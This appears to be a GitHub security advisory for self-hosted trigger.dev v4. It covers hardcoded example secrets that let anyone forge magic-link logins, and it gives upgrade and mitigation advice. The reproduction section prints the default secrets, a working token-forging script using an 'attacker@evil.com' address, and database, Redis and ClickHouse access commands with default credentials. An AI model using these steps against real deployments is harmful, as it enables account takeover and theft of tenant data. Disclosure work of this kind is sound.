GHSA-pqxw-g93w-hj9x: Npm/trigger.dev vulnerability
Summary
Self-hosted trigger.dev v4 instances deployed using the provided Docker Compose configuration with default secrets from hosting/docker/.env.example are vulnerable to a multi-stage unauthenticated attack chain leading to complete infrastructure compromise.
Vulnerability Details
The hosting/docker/.env.example file contains hardcoded cryptographic secrets:
SESSIONSECRET=2818143646516f6fffd707b36f334bbb MAGICLINKSECRET=44da78b7bbb0dfe709cf38931d25dcdd ENCRYPTIONKEY=f686147ab967943ebbe9ed3b496e465a MANAGEDWORKERSECRET=447c29678f9eaf289e9c4b70d3dd8a7f
The MAGICLINKSECRET is used by remix-auth-email-link@2.0.2 to create authentication tokens via CryptoJS AES encryption. An attacker who knows this secret can forge valid magic links that authenticate as any email address without email delivery. The validateSessionMagicLink option defaults to false in the library (never overridden by trigger.dev), so no session-side validation occurs. User accounts are auto-created when WHITELISTEDEMAILS is not set (the default for self-hosted).
Steps to Reproduce
Setup bash cd hosting/docker && cp .env.example .env cd webapp && docker compose up -d cd ../worker && docker compose up -d
Step 1: Forge magic link token javascript const CryptoJS = require('crypto-js'); const secret = '44da78b7bbb0dfe709cf38931d25dcdd'; const payload = JSON.stringify({e: 'attacker@evil.com', c: Date.now()}); const token = encodeURIComponent(CryptoJS.AES.encrypt(payload, secret).toString()); console.log('https://target:8030/magic?token=' + token);
Step 2: Authenticate via forged magic link bash curl -v "http://localhost:8030/magic?token=" Returns: HTTP 302, set-cookie: session=eyJ1c2VyIjp7InVzZXJJZCI6ImNtcGg3OTBxZjAwMDR0bjU1ZWM3bHlxN2EifX0=... User auto-created, session cookie set, redirects to /orgs/new
Step 3: Verify database access from runner network bash docker run --rm --network webapp postgres:14 psql "postgresql://postgres:unsafe-postgres-pw@postgres:5432/main" -c "SELECT id, email FROM \"User\";" Returns: cmph790qf0004tn55ec7lyq7a | attacker@evil.com
Step 4: Verify Redis access (no auth) bash docker run --rm --network webapp redis:7 redis-cli -h redis PING Returns: PONG
Step 5: Verify ClickHouse access bash docker run --rm --network webapp curlimages/curl curl -s "http://default:password@clickhouse:8123/?query=SELECT%20version()" Returns: 25.5.2.47
Root Cause
1. Hardcoded secrets in hosting/docker/.env.example (lines 9-12) 2. Runner containers placed on infrastructure networks: DOCKERRUNNERNETWORKS: webapp,supervisor in hosting/docker/worker/docker-compose.yml:42 3. Default credentials on all infrastructure services 4. No Redis authentication 5. SESSIONSECRET reused for JWT signing (apps/webapp/app/services/apiAuth.server.ts:616) and impersonation tokens
Impact
Complete infrastructure compromise: all tenant data, API keys, encrypted secrets (decryptable with known ENCRYPTIONKEY), user accounts, cross-tenant access. Attacker can modify data, push backdoored Docker images to the registry, and manipulate job queues.
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/trigger.devto a version that resolves this vulnerability.Fixed in 4.5.6
Event History
Frequently Asked Questions
Which deployments are exposed?
Self-hosted trigger.dev v4 deployments using the provided Docker Compose setup are exposed if their .env file retains the secrets from hosting/docker/.env.example. The default self-hosted configuration also leaves WHITELISTED_EMAILS unset, allowing accounts to be created automatically.
What does an attacker need to exploit the authentication weakness?
The attacker needs knowledge of the hardcoded MAGIC_LINK_SECRET, which is included in the example environment file. They can use it to forge valid magic-link tokens for any email address without receiving an email.
Does the default configuration provide session-side validation for forged magic links?
No. The remix-auth-email-link library's validateSessionMagicLink setting defaults to false, and trigger.dev does not override that default.
How can I determine whether an instance is affected?
Check the deployment's .env file for SESSION_SECRET, MAGIC_LINK_SECRET, ENCRYPTION_KEY, and MANAGED_WORKER_SECRET values matching hosting/docker/.env.example. Also check whether WHITELISTED_EMAILS is unset.
What can be done if updating is not immediately possible?
Do not continue using the example cryptographic secrets in a deployed environment; replace them with deployment-specific values. Configure WHITELISTED_EMAILS to prevent automatic account creation.